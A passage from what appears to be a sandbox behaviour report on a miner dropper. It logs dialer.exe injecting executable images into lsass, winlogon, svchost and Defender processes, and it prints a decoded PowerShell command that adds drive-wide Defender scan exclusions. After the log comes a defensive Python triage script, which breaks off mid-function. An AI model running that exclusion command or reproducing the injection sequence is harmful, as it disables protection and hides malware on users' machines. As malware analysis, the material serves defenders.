Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\wbem\WmiPrvSE.exe base: 2534CF60000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Program Files\Windows Defender\MpCmdRun.exe base: 2E8CE7E0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\conhost.exe base: 1DB17B50000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\wbem\WMIADAP.exe base: 1E367A40000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\wbem\WMIADAP.exe base: 1E367D00000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe Code function: 45_2_0000000140001C88 CreateProcessW,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,VirtualAlloc,GetThreadContext,WriteProcessMemory,SetThreadContext,ResumeThread,OpenProcess,TerminateProcess,45_2_0000000140001C88
Source: C:\Windows\System32\dialer.exe Thread created: C:\Windows\System32\winlogon.exe EIP: 9172273C
Source: C:\Windows\System32\dialer.exe Thread created: C:\Windows\System32\lsass.exe EIP: BDCB273C
Source: C:\Windows\System32\dialer.exe Thread created: C:\Windows\System32\svchost.exe EIP: 709A273C
Source: C:\Windows\System32\dialer.exe Thread created: C:\Windows\System32\dwm.exe EIP: B15B273C
Source: C:\Windows\System32\dialer.exe Thread created: unknown EIP: EFFC273C
Source: C:\Windows\System32\dialer.exe Thread created: unknown EIP: AFB8273C
Source: C:\Windows\System32\dialer.exe Thread created: unknown EIP: 6F7B273C
Source: C:\Windows\System32\dialer.exe Thread created: unknown EIP: 7C38273C
Source: C:\Windows\System32\dialer.exe Thread created: unknown EIP: 8275273C
Source: C:\Windows\System32\dialer.exe Thread created: unknown EIP: 1B1D273C
Source: C:\Windows\System32\dialer.exe Thread created: unknown EIP: 6AD4273C
Source: C:\Windows\System32\dialer.exe Thread created: unknown EIP: D3CA273C
Source: C:\Windows\System32\dialer.exe Thread created: unknown EIP: 73D3273C
Source: C:\Windows\System32\dialer.exe Thread created: unknown EIP: 21B273C
Source: C:\Windows\System32\dialer.exe Thread created: unknown EIP: B9FD273C
Source: C:\Windows\System32\dialer.exe Thread created: unknown EIP: 54D8273C
Source: C:\Windows\System32\dialer.exe Thread created: unknown EIP: 57DA273C
Source: C:\Windows\System32\dialer.exe Thread created: unknown EIP: 33B4273C
Source: C:\Windows\System32\dialer.exe Thread created: unknown EIP: 7453273C
Source: C:\Windows\System32\dialer.exe Thread created: unknown EIP: 1574273C
Source: C:\Windows\System32\dialer.exe Thread created: unknown EIP: C854273C
Source: C:\Windows\System32\dialer.exe Thread created: unknown EIP: 212A273C
Source: C:\Windows\System32\dialer.exe Thread created: unknown EIP: 6D54273C
Source: C:\Windows\System32\dialer.exe Thread created: unknown EIP: D895273C
Source: C:\Windows\System32\dialer.exe Thread created: unknown EIP: 433273C
Source: C:\Windows\System32\dialer.exe Thread created: unknown EIP: 8E7273C
Source: C:\Windows\System32\dialer.exe Thread created: unknown EIP: 1936273C
Source: C:\Windows\System32\dialer.exe Thread created: unknown EIP: 3180273C
Source: C:\Windows\System32\dialer.exe Thread created: unknown EIP: DD9B273C
Source: C:\Windows\System32\dialer.exe Thread created: unknown EIP: FA1C273C
Source: C:\Windows\System32\dialer.exe Thread created: unknown EIP: D5273C
Source: C:\Windows\System32\dialer.exe Thread created: unknown EIP: D256273C
Source: C:\Windows\System32\dialer.exe Thread created: unknown EIP: 519273C
Source: C:\Windows\System32\dialer.exe Thread created: unknown EIP: D1A0273C
Source: C:\Windows\System32\dialer.exe Thread created: unknown EIP: B0DA273C
Source: C:\Windows\System32\dialer.exe Thread created: unknown EIP: 6E55273C
Source: C:\Windows\System32\dialer.exe Thread created: unknown EIP: FC6C273C
Source: C:\Windows\System32\dialer.exe Thread created: unknown EIP: FAC273C
Source: C:\Windows\System32\dialer.exe Thread created: unknown EIP: 1A93273C
Source: C:\Windows\System32\dialer.exe Thread created: unknown EIP: 88F9273C
Source: C:\Windows\System32\dialer.exe Thread created: unknown EIP: 857C273C
Source: C:\Windows\System32\dialer.exe Thread created: unknown EIP: DEDC273C
Source: C:\Windows\System32\dialer.exe Thread created: unknown EIP: A211273C
Source: C:\Windows\System32\dialer.exe Thread created: unknown EIP: 9D9273C
Source: C:\Windows\System32\dialer.exe Thread created: unknown EIP: FBEC273C
Source: C:\Windows\System32\dialer.exe Thread created: unknown EIP: 7C62273C
Source: C:\Windows\System32\dialer.exe Thread created: unknown EIP: 5975273C
Source: C:\Windows\System32\dialer.exe Thread created: unknown EIP: AB59273C
Source: C:\Windows\System32\dialer.exe Thread created: unknown EIP: F95A273C
Source: C:\Windows\System32\dialer.exe Thread created: unknown EIP: 9EEE273C
Source: C:\Windows\System32\dialer.exe Thread created: unknown EIP: 2B2E273C
Source: C:\Windows\System32\dialer.exe Thread created: unknown EIP: CC6E273C
Source: C:\Windows\System32\dialer.exe Thread created: unknown EIP: B69273C
Source: C:\Windows\System32\dialer.exe Thread created: unknown EIP: 14DD273C
Source: C:\Windows\System32\dialer.exe Thread created: unknown EIP: 44F7273C
Source: C:\Windows\System32\dialer.exe Thread created: unknown EIP: 2ED5273C
Source: C:\Windows\System32\dialer.exe Thread created: unknown EIP: E6AF273C
Source: C:\Windows\System32\dialer.exe Thread created: unknown EIP: 84C2273C
Source: C:\Windows\System32\dialer.exe Thread created: unknown EIP: A078273C
Source: C:\Windows\System32\dialer.exe Thread created: unknown EIP: 4DDB273C
Source: C:\Windows\System32\dialer.exe Thread created: unknown EIP: F4C9273C
Source: C:\Windows\System32\dialer.exe Thread created: unknown EIP: A511273C
Source: C:\Windows\System32\dialer.exe Thread created: unknown EIP: 4ACF273C
Source: C:\Windows\System32\dialer.exe Thread created: unknown EIP: 85DA273C
Source: C:\Windows\System32\dialer.exe Thread created: unknown EIP: 1076273C
Source: C:\Windows\System32\dialer.exe Thread created: unknown EIP: 7CDE273C
Source: C:\Windows\System32\dialer.exe Thread created: unknown EIP: 9418273C
Source: C:\Windows\System32\dialer.exe Thread created: unknown EIP: 5437273C
Source: C:\Windows\System32\dialer.exe Thread created: unknown EIP: 6094273C
Source: C:\Windows\System32\dialer.exe Thread created: unknown EIP: 8CF0273C
Source: C:\Windows\System32\dialer.exe Thread created: unknown EIP: DA19273C
Source: C:\Windows\System32\dialer.exe Thread created: unknown EIP: 3A00273C
Source: C:\Windows\System32\dialer.exe Thread created: unknown EIP: 4DB2273C
Source: C:\Windows\System32\dialer.exe Thread created: unknown EIP: B9BD273C
Source: C:\Windows\System32\dialer.exe Thread created: unknown EIP: 8E94273C
Source: C:\Windows\System32\dialer.exe Thread created: unknown EIP: 4CF6273C
Source: C:\Windows\System32\dialer.exe Thread created: unknown EIP: CE7E273C
Source: C:\Windows\System32\dialer.exe Thread created: unknown EIP: 17B5273C
Source: C:\Windows\System32\dialer.exe Thread created: unknown EIP: 67A4273C
Source: C:\Windows\System32\dialer.exe Thread created: unknown EIP: 67D0273C
Source: C:\Users\user\Desktop\kx new.exe Process created: Base64 decoded <#dpt#>Add-MpPreference <#apt#> -ExclusionPath @($env:UserProfile,$env:SystemDrive) <#njg#> -Force <#hnq#>
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\winlogon.exe base: 2E991720000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\lsass.exe base: 213BDCB0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\svchost.exe base: 158709A0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\dwm.exe base: 26DB15B0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\svchost.exe base: 2A3EFFC0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\svchost.exe base: 2C9AFB80000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\svchost.exe base: 2C06F7B0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\svchost.exe base: 2917C380000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\svchost.exe base: 22382750000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\svchost.exe base: 28A1B1D0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\svchost.exe base: 1486AD40000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\svchost.exe base: 24BD3CA0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\svchost.exe base: 1FA73D30000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\svchost.exe base: 1CD021B0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\svchost.exe base: 269B9FD0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\svchost.exe base: 22054D80000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\svchost.exe base: 27C57DA0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\svchost.exe base: 2A333B40000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\svchost.exe base: 1F174530000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\svchost.exe base: 23315740000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\svchost.exe base: 2A9C8540000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\svchost.exe base: 1EC212A0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\svchost.exe base: 1876D540000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\svchost.exe base: 22CD8950000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\svchost.exe base: 15104330000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\svchost.exe base: 22308E70000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\svchost.exe base: 1AB19360000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\svchost.exe base: 1E731800000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\svchost.exe base: 1A6DD9B0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\svchost.exe base: 1E2FA1C0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\spoolsv.exe base: D50000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\svchost.exe base: 209D2560000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\svchost.exe base: 1FC05190000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\svchost.exe base: 2AFD1A00000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\svchost.exe base: 1D6B0DA0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\svchost.exe base: 2036E550000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe Memory written: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe base: 150FC6C0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\svchost.exe base: 2480FAC0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\svchost.exe base: 2671A930000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\svchost.exe base: 2C588F90000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\svchost.exe base: 1A8857C0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\svchost.exe base: 174DEDC0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\svchost.exe base: 282A2110000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\svchost.exe base: 1DA09D90000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\svchost.exe base: 287FBEC0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\sihost.exe base: 2537C620000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\svchost.exe base: 29B59750000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\svchost.exe base: 20CAB590000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\svchost.exe base: 1BBF95A0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\svchost.exe base: 1D49EEE0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\ctfmon.exe base: 26E2B2E0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\svchost.exe base: 1B0CC6E0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\explorer.exe base: B690000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\svchost.exe base: 23014DD0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\svchost.exe base: 21744F70000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\svchost.exe base: 1F02ED50000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\dasHost.exe base: 1B2E6AF0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 25A84C20000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 194A0780000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\svchost.exe base: 2AD4DDB0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\dllhost.exe base: 1C0F4C90000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 1F3A5110000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\smartscreen.exe base: 2164ACF0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\svchost.exe base: 19985DA0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 26D10760000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\ApplicationFrameHost.exe base: 23F7CDE0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 2EE94180000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\ImmersiveControlPanel\SystemSettings.exe base: 23954370000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 1DC60940000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\conhost.exe base: 2458CF00000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1B2DA190000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 2B53A000000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 26C4DB20000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 1FAB9BD0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1278E940000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 2534CF60000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exeMemory written: C:\Program Files\Windows Defender\MpCmdRun.exe base: 2E8CE7E0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\conhost.exe base: 1DB17B50000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\wbem\WMIADAP.exe base: 1E367A40000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\wbem\WMIADAP.exe base: 1E367D00000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exeMemory written: PID: 4084 base: B690000 value: 4D
Source: C:\Users\user\AppData\Local\Temp\Kawpow new.exe Thread register set: target process: 4032
Source: C:\Users\user\AppData\Local\Temp\xmr new.exe Thread register set: target process: 2788
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\winlogon.exe base: 2E991720000
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\lsass.exe base: 213BDCB0000
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\svchost.exe base: 158709A0000
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\dwm.exe base: 26DB15B0000
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\svchost.exe base: 2A3EFFC0000
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\svchost.exe base: 2C9AFB80000
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\svchost.exe base: 2C06F7B0000
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\svchost.exe base: 2917C380000
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\svchost.exe base: 22382750000
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\svchost.exe base: 28A1B1D0000
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\svchost.exe base: 1486AD40000
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\svchost.exe base: 24BD3CA0000
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\svchost.exe base: 1FA73D30000
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\svchost.exe base: 1CD021B0000
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\svchost.exe base: 269B9FD0000
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\svchost.exe base: 22054D80000
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\svchost.exe base: 27C57DA0000
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\svchost.exe base: 2A333B40000
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\svchost.exe base: 1F174530000
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\svchost.exe base: 23315740000
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\svchost.exe base: 2A9C8540000
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\svchost.exe base: 1EC212A0000
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\svchost.exe base: 1876D540000
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\svchost.exe base: 22CD8950000
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\svchost.exe base: 15104330000
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\svchost.exe base: 22308E70000
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\svchost.exe base: 1AB19360000
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\svchost.exe base: 1E731800000
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\svchost.exe base: 1A6DD9B0000
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\svchost.exe base: 1E2FA1C0000
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\spoolsv.exe base: D50000
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\svchost.exe base: 209D2560000
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\svchost.exe base: 1FC05190000
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\svchost.exe base: 2AFD1A00000
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\svchost.exe base: 1D6B0DA0000
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\svchost.exe base: 2036E550000
Source: C:\Windows\System32\dialer.exe Memory written: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe base: 150FC6C0000
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\svchost.exe base: 2480FAC0000
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\svchost.exe base: 2671A930000
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\svchost.exe base: 2C588F90000
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\svchost.exe base: 1A8857C0000
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\svchost.exe base: 174DEDC0000
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\svchost.exe base: 282A2110000
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\svchost.exe base: 1DA09D90000
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\svchost.exe base: 287FBEC0000
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\sihost.exe base: 2537C620000
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\svchost.exe base: 29B59750000
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\svchost.exe base: 20CAB590000
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\svchost.exe base: 1BBF95A0000
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\svchost.exe base: 1D49EEE0000
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\ctfmon.exe base: 26E2B2E0000
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\svchost.exe base: 1B0CC6E0000
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\explorer.exe base: B690000
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\svchost.exe base: 23014DD0000
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\svchost.exe base: 21744F70000
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\svchost.exe base: 1F02ED50000
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\dasHost.exe base: 1B2E6AF0000
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 25A84C20000
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 194A0780000
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\svchost.exe base: 2AD4DDB0000
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\dllhost.exe base: 1C0F4C90000
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 1F3A5110000
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\smartscreen.exe base: 2164ACF0000
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\svchost.exe base: 19985DA0000
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 26D10760000
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\ApplicationFrameHost.exe base: 23F7CDE0000
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 2EE94180000
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\ImmersiveControlPanel\SystemSettings.exe base: 23954370000
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 1DC60940000
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\conhost.exe base: 2458CF00000
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\svchost.exe base: 1B2DA190000
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\svchost.exe base: 2B53A000000
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 26C4DB20000
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 1FAB9BD0000
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\svchost.exe base: 1278E940000
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 2534CF60000
Source: C:\Windows\System32\dialer.exe Memory written: C:\Program Files\Windows Defender\MpCmdRun.exe base: 2E8CE7E0000
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\conhost.exe base: 1DB17B50000
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\wbem\WMIADAP.exe base: 1E367A40000
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\wbem\WMIADAP.exe base: 1E367D00000
Source: C:\Windows\System32\lsass.exe Memory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 2534CF30000
Source: C:\Windows\System32\lsass.exe Memory written: C:\Windows\System32\svchost.exe base: 1D6B1000000
Source: C:\Windows\System32\lsass.exe Memory written: C:\Windows\System32\svchost.exe base: 1D6B1000000
Source: C:\Windows\System32\lsass.exe Memory written: C:\Windows\System32\svchost.exe base: 1D6B1000000
Source: C:\Windows\System32\lsass.exe Memory written: C:\Windows\System32\svchost.exe base: 1D6B1000000
Source: C:\Windows\System32\lsass.exe Memory written: C:\Windows\System32\svchost.exe base: 1D6B1000000
Source: C:\Windows\System32\lsass.exe Memory written: C:\Windows\System32\svchost.exe base: 1D6B1000000
Source: C:\Windows\System32\lsass.exe Memory written: C:\Windows\System32\svchost.exe base: 1D6B1000000
Source: C:\Windows\System32\lsass.exe Memory written: C:\Windows\System32\svchost.exe base: 1D6B1000000
Source: C:\Windows\System32\lsass.exe Memory written: C:\Windows\System32\svchost.exe base: 1D6B1000000
Source: C:\Windows\System32\lsass.exe Memory written: C:\Windows\System32\svchost.exe base: 1D6B1000000
Source: C:\Windows\System32\lsass.exe Memory written: C:\Windows\System32\svchost.exe base: 1D6B1000000
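The run of "Memory written" entries above is long enough that the important facts get lost in it: dialer.exe, a signed Windows binary started by both dropped miner stagers, writes into dozens of processes including lsass.exe, winlogon.exe, dwm.exe and spoolsv.exe, many of the buffers begin with 4D5A (the "MZ" PE signature, i.e. a whole image is being mapped in), targets include Defender's own MpCmdRun.exe and smartscreen.exe, and lsass.exe subsequently shows up as a source writing into svchost.exe and WmiPrvSE.exe, which means the injected code is propagating from a process that was itself a victim. The Python below is an added example, not part of the Joe Sandbox report or of the sample. It parses the entries exactly as rendered on this page (tolerating the fused "exeMemory written:" form), groups them by injecting process, counts PE-image writes, flags security-sensitive targets, and reports chained injection. The SAMPLE block is a constructed subset of lines copied from the report, and the SENSITIVE image list is the author's own choice.

```python
"""Triage 'Memory written' evidence lines from a sandbox behaviour report.

Added example (not the sandbox's own code). Input format as rendered on the
page: 'Source: <image> Memory written: <target> base: <hex> [value[ starts
with]: <hex>]'. The space before 'Memory written' may be missing.
"""
import re

LINE_RE = re.compile(
    r"^Source:\s*(?P<src>.+?)\s*Memory written:\s*(?P<dst>.+?)\s*base:\s*"
    r"(?P<base>[0-9A-Fa-f]+)(?:\s*value(?: starts with)?:\s*(?P<val>[0-9A-Fa-f]+))?\s*$"
)

# Author's choice: images an unrelated process should never write into.
SENSITIVE = {"lsass.exe", "winlogon.exe", "csrss.exe", "services.exe", "dwm.exe",
             "explorer.exe", "spoolsv.exe", "mpcmdrun.exe", "smartscreen.exe"}

# Constructed sample: a subset of lines copied from the report above, in both
# renderings (fused and with a space before 'Memory written').
SAMPLE = r"""
Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 2480FAC0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\explorer.exe base: B690000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exeMemory written: C:\Program Files\Windows Defender\MpCmdRun.exe base: 2E8CE7E0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exeMemory written: PID: 4084 base: B690000 value: 4D
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\winlogon.exe base: 2E991720000
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\lsass.exe base: 213BDCB0000
Source: C:\Windows\System32\lsass.exe Memory written: C:\Windows\System32\svchost.exe base: 1D6B1000000
Source: C:\Windows\System32\lsass.exe Memory written: C:\Windows\System32\svchost.exe base: 1D6B1000000
"""


def image_name(path):
    """Last path component, lower-cased; None for non-path targets such as 'PID: 4084'."""
    name = path.rsplit("\\", 1)[-1].strip().lower()
    return name if name.endswith(".exe") else None


def parse_line(line):
    """Return a dict for one 'Memory written' entry, or None for anything else."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    return {
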